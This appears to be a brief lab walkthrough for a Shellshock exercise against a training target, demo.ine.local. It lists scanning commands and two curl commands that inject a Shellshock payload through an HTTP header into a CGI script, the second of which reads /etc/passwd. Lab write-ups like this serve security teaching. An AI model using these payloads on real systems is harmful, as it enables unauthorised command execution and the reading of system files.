Shellshock

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Objective: Exploit the vulnerability and execute arbitrary commands on the target machine.

nmap demo.ine.local -sSVC

dirsearch -u demo.ine.local

curl -H "Useragent: () { :; }; echo \"Content-type: text/plain\"; echo; echo; echo 'VULNERABLE'" http://demo.ine.local/gettime.cgi

curl -H "Useragent: () { :; }; echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://demo.ine.local/gettime.cgi

Last updated 7 months ago